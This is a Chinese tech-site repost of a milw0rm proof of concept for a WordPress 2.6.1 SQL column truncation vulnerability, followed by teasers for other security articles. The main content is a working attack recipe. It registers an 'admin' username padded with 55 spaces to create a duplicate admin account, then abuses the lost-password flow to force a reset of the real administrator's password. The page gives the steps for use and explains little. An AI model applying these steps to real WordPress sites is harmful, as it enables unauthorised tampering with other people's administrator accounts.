首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

WordPress 2.6.1 SQL Column Truncation Vulnerability

所属分类: 网络安全 / 黑客教程 阅读数: 2205
收藏 0 赞 0 分享
用wordpress的要注意了 # WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x
email: your email^ admin[55 space chars]x now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email ;/ # milw0rm.com

更多精彩内容其他人还在看

为何黑客要挟制路由器DNS 用户该怎样实时发觉和防备方法

起首说说挟制路由器是什么意思,路由器挟制平日指的是,开启了无线网络功效的无线路由器,攻击者经由过程破解无线暗码衔接上无线网后,再登录路由治理界面来节制全部无线网,被挟制以后能够随意率性改动后盾设置。下面我们一起看看怎么防备黑客入侵
收藏 0 赞 0 分享

大势至共享文件监控软件、共享文件权限管理软件主控端与客户端的连接设置方法详解

这篇文章主要介绍了大势至共享文件监控软件、共享文件权限管理软件主控端与客户端的连接设置方法详解,,小编觉得还是挺不错的,具有一定借鉴价值,下面就来和小编一起看看吧
收藏 0 赞 0 分享

server2008共享设置、服务器共享文件设置、服务器设置共享文件夹的方法详细介绍

这篇文章主要介绍了server2008共享设置、服务器共享文件设置、服务器设置共享文件夹的方法详细介绍,保护服务器共享文件设置访问权限,让每个部门只访问自己的共享文件等,下面随小编一起来看看吧
收藏 0 赞 0 分享

大势至网络终端准入控制系统、局域网网络准入控制方案最新版使用说明!

这篇文章主要介绍了大势至网络终端准入控制系统、局域网网络准入控制方案最新版使用说明,小编觉得还是挺不错的,这里分享给大家,需要的朋友可以看下。
收藏 0 赞 0 分享

大势至局域网接入认证软件、禁止电脑接入局域网软件V9.0正式发布

这篇文章主要介绍了大势至局域网接入认证软件、禁止电脑接入局域网软件V9.0正式发布,小编觉得还是挺不错的,这里分享给大家,需要的朋友可以看下。
收藏 0 赞 0 分享

大势至电脑文件安全管理软件、计算机文件防泄密软件V12版本发布

这篇文章主要介绍了大势至电脑文件安全管理软件、计算机文件防泄密软件V12版本发布,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
收藏 0 赞 0 分享

大势至共享文件权限管理软件、公司内部文件共享、企业共享文件解决方案

这篇文章主要介绍了大势至共享文件权限管理软件、公司内部文件共享、企业共享文件解决方案的相关资料,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
收藏 0 赞 0 分享

反垃圾邮件技术之密径追踪(图)

中国的网民数量已突破1 亿,每年电子邮件发送量达500 亿封,但是这样的数据却并不能令我们惊喜,因为在这500 亿封电子邮件中,有将近60%也就是有300 亿封是垃圾邮件。垃圾邮件已经成为一个综合性的社会问题,要想从根本上杜绝垃圾邮件的泛滥,必须采取全民总动员的方式
收藏 0 赞 0 分享

详细介绍如何捕获网络数据包

前 言 经常看到论坛有人问起关于数据包的截获、分析等问题,幸好本人也对此略有所知,也写过很多的sniffer,所以就想写一系列的文章来详细深入的探讨关于数据包的知识。 我希望通过这一系列的文章,能使得关于数据包的知识得以普及,所以这系列的每一篇文
收藏 0 赞 0 分享

黑客的脚本漏洞工具分析(图)

上图只是对一个网站注入点的工具检测,当然看到了结果扫出来的密码为16位的md5加密码,但我们可以通过md5密码破解工具进行破解的。然后找到后台用所得的用户名和密码进行登录即可。对于黑客软件,其实并不是我们想象的那么复杂,只是根据掌握的漏洞信息提交相应该的
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 www.zhanzhang360.cn Some Rights Reserved.
沪ICP备13040166号-22